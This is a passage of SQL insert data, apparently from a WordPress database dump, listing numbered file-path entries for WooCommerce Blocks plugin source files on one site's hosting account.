s/woocommerce-blocks/assets/js/blocks/product-collection/inspector-controls/taxonomy-controls/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-collection/inspector-controls/taxonomy-controls/index.tsx'),(9187,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-collection/inspector-controls/taxonomy-controls/taxonomy-item.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-collection/inspector-controls/taxonomy-controls/taxonomy-item.tsx'),(9188,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-collection/inspector-controls/upgrade-notice.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-collection/inspector-controls/upgrade-notice.tsx'),(9189,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-collection/save.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-collection/save.tsx'),(9190,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-collection/toolbar-controls/display-settings-toolbar.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-collection/toolbar-controls/display-settings-toolbar.tsx'),(9191,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-collection/toolbar-controls/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-collection/toolbar-controls/index.tsx'),(9192,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-collection/types.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-collection/types.ts'),(9193,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-collection/utils.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-collection/utils.tsx'),(9194,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-collection/variations/elements/product-summary.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-collection/variations/elements/product-summary.tsx'),(9195,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-collection/variations/elements/product-title.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-collection/variations/elements/product-title.tsx'),(9196,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-collection/variations/elements/utils.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-collection/variations/elements/utils.tsx'),(9197,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-collection/variations/index.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-collection/variations/index.ts'),(9198,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-gallery/block-settings/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-gallery/block-settings/index.tsx'),(9199,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-gallery/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-gallery/block.json'),(9200,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-gallery/edit.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-gallery/edit.tsx'),(9201,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-gallery/editor.scss','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-gallery/editor.scss'),(9202,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-gallery/frontend.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-gallery/frontend.tsx'),(9203,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-gallery/icon.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-gallery/icon.tsx'),(9204,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-gallery/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-gallery/index.tsx'),(9205,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-gallery/inner-blocks/product-gallery-large-image/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-gallery/inner-blocks/product-gallery-large-image/block.json'),(9206,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-gallery/inner-blocks/product-gallery-large-image/edit.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-gallery/inner-blocks/product-gallery-large-image/edit.tsx'),(9207,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-gallery/inner-blocks/product-gallery-large-image/editor.scss','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-gallery/inner-blocks/product-gallery-large-image/editor.scss'),(9208,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-gallery/inner-blocks/product-gallery-large-image/frontend.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-gallery/inner-blocks/product-gallery-large-image/frontend.tsx'),(9209,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-gallery/inner-blocks/product-gallery-large-image/icon.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-gallery/inner-blocks/product-gallery-large-image/icon.tsx'),(9210,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-gallery/inner-blocks/product-gallery-large-image/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-gallery/inner-blocks/product-gallery-large-image/index.tsx'),(9211,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-gallery/inner-blocks/product-gallery-large-image/save.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-gallery/inner-blocks/product-gallery-large-image/save.tsx'),(9212,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-gallery/inner-blocks/product-gallery-large-image/style.scss','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-gallery/inner-blocks/product-gallery-large-image/style.scss'),(9213,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-gallery/inner-blocks/product-gallery-large-image-next-previous/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-gallery/inner-blocks/product-gallery-large-image-next-previous/block.json'),(9214,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-gallery/inner-blocks/product-gallery-large-image-next-previous/edit.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-gallery/inner-blocks/product-gallery-large-image-next-previous/edit.tsx'),(9215,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-gallery/inner-blocks/product-gallery-large-image-next-previous/editor.scss','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-gallery/inner-blocks/product-gallery-large-image-next-previous/editor.scss'),(9216,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-gallery/inner-blocks/product-gallery-large-image-next-previous/icons.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-gallery/inner-blocks/product-gallery-large-image-next-previous/icons.tsx'),(9217,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-gallery/inner-blocks/product-gallery-large-image-next-previous/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-gallery/inner-blocks/product-gallery-large-image-next-previous/index.tsx'),(9218,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-gallery/inner-blocks/product-gallery-large-image-next-previous/save.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-gallery/inner-blocks/product-gallery-large-image-next-previous/save.tsx'),(9219,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-gallery/inner-blocks/product-gallery-large-image-next-previous/settings.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-gallery/inner-blocks/product-gallery-large-image-next-previous/settings.tsx'),(9220,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-gallery/inner-blocks/product-gallery-large-image-next-previous/style.scss','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-gallery/inner-blocks/product-gallery-large-image-next-previous/style.scss'),(9221,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-gallery/inner-blocks/product-gallery-large-image-next-previous/types.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-gallery/inner-blocks/product-gallery-large-image-next-previous/types.ts'),(9222,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-gallery/inner-blocks/product-gallery-pager/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-gallery/inner-blocks/product-gallery-pager/block.json'),(9223,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-gallery/inner-blocks/product-gallery-pager/constants.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-gallery/inner-blocks/product-gallery-pager/constants.ts'),(9224,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-gallery/inner-blocks/product-gallery-pager/edit.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-gallery/inner-blocks/product-gallery-pager/edit.tsx'),(9225,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-gallery/inner-blocks/product-gallery-pager/editor.scss','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-gallery/inner-blocks/product-gallery-pager/editor.scss'),(9226,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-gallery/inner-blocks/product-gallery-pager/icons.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-gallery/inner-blocks/product-gallery-pager/icons.tsx'),(9227,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-gallery/inner-blocks/product-gallery-pager/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-gallery/inner-blocks/product-gallery-pager/index.tsx'),(9228,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-gallery/inner-blocks/product-gallery-pager/settings.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-gallery/inner-blocks/product-gallery-pager/settings.tsx'),(9229,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-gallery/inner-blocks/product-gallery-pager/style.scss','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-gallery/inner-blocks/product-gallery-pager/style.scss'),(9230,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-gallery/inner-blocks/product-gallery-pager/types.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-gallery/inner-blocks/product-gallery-pager/types.tsx'),(9231,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-gallery/inner-blocks/product-gallery-thumbnails/block-settings/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-gallery/inner-blocks/product-gallery-thumbnails/block-settings/index.tsx'),(9232,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-gallery/inner-blocks/product-gallery-thumbnails/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-gallery/inner-blocks/product-gallery-thumbnails/block.json'),(9233,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-gallery/inner-blocks/product-gallery-thumbnails/constants.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-gallery/inner-blocks/product-gallery-thumbnails/constants.tsx'),(9234,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-gallery/inner-blocks/product-gallery-thumbnails/edit.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-gallery/inner-blocks/product-gallery-thumbnails/edit.tsx'),(9235,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-gallery/inner-blocks/product-gallery-thumbnails/editor.scss','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-gallery/inner-blocks/product-gallery-thumbnails/editor.scss'),(9236,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-gallery/inner-blocks/product-gallery-thumbnails/icon.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-gallery/inner-blocks/product-gallery-thumbnails/icon.tsx'),(9237,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-gallery/inner-blocks/product-gallery-thumbnails/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-gallery/inner-blocks/product-gallery-thumbnails/index.tsx'),(9238,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-gallery/inner-blocks/product-gallery-thumbnails/style.scss','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-gallery/inner-blocks/product-gallery-thumbnails/style.scss'),(9239,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-gallery/save.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-gallery/save.tsx'),(9240,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-gallery/types.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-gallery/types.ts'),(9241,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-gallery/utils.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-gallery/utils.tsx'),(9242,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-new/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-new/block.json'),(9243,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-new/block.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-new/block.tsx'),(9244,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-new/edit.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-new/edit.tsx'),(9245,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-new/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-new/index.tsx'),(9246,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-new/types.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-new/types.ts'),(9247,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-on-sale/block.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-on-sale/block.tsx'),(9248,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-on-sale/editor.scss','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-on-sale/editor.scss'),(9249,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-on-sale/index.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-on-sale/index.js'),(9250,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-on-sale/inspector-controls.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-on-sale/inspector-controls.tsx'),(9251,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-on-sale/types.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-on-sale/types.ts'),(9252,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-query/constants.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-query/constants.ts'),(9253,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-query/editor.scss','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-query/editor.scss'),(9254,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-query/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-query/index.tsx'),(9255,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-query/inspector-controls/attributes-filter.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-query/inspector-controls/attributes-filter.tsx'),(9256,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-query/inspector-controls/popular-presets.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-query/inspector-controls/popular-presets.tsx'),(9257,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-query/inspector-controls/product-selector.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-query/inspector-controls/product-selector.tsx'),(9258,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-query/inspector-controls/upgrade-notice.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-query/inspector-controls/upgrade-notice.tsx'),(9259,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-query/inspector-controls.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-query/inspector-controls.tsx'),(9260,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-query/style.scss','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-query/style.scss'),(9261,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-query/types.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-query/types.ts'),(9262,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-query/utils.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-query/utils.tsx'),(9263,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-query/variations/elements/product-summary.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-query/variations/elements/product-summary.tsx'),(9264,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-query/variations/elements/product-template.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-query/variations/elements/product-template.tsx'),(9265,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-query/variations/elements/product-title.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-query/variations/elements/product-title.tsx'),(9266,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-query/variations/elements/utils.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-query/variations/elements/utils.tsx'),(9267,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-query/variations/index.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-query/variations/index.ts'),(9268,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-query/variations/product-query.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-query/variations/product-query.tsx'),(9269,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-query/variations/related-products.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-query/variations/related-products.tsx'),(9270,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-results-count/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-results-count/block.json'),(9271,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-results-count/edit.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-results-count/edit.tsx'),(9272,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-results-count/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-results-count/index.tsx'),(9273,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-results-count/style.scss','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-results-count/style.scss'),(9274,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-search/block.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-search/block.tsx'),(9275,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-search/edit.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-search/edit.tsx'),(9276,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-search/editor.scss','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-search/editor.scss'),(9277,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-search/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-search/index.tsx'),(9278,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-search/style.scss','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-search/style.scss'),(9279,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-tag/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-tag/block.json'),(9280,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-tag/block.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-tag/block.tsx'),(9281,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-tag/edit.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-tag/edit.tsx'),(9282,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-tag/editor.scss','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-tag/editor.scss'),(9283,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-tag/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-tag/index.tsx'),(9284,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-tag/types.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-tag/types.ts'),(9285,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-template/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-template/block.json'),(9286,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-template/edit.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-template/edit.tsx'),(9287,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-template/editor.scss','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-template/editor.scss'),(9288,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-template/icon.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-template/icon.tsx'),(9289,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-template/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-template/index.tsx'),(9290,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-template/save.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-template/save.tsx'),(9291,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-template/style.scss','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-template/style.scss'),(9292,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-top-rated/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-top-rated/block.json'),(9293,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-top-rated/block.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-top-rated/block.tsx'),(9294,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-top-rated/edit.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-top-rated/edit.tsx'),(9295,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-top-rated/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-top-rated/index.tsx'),(9296,'/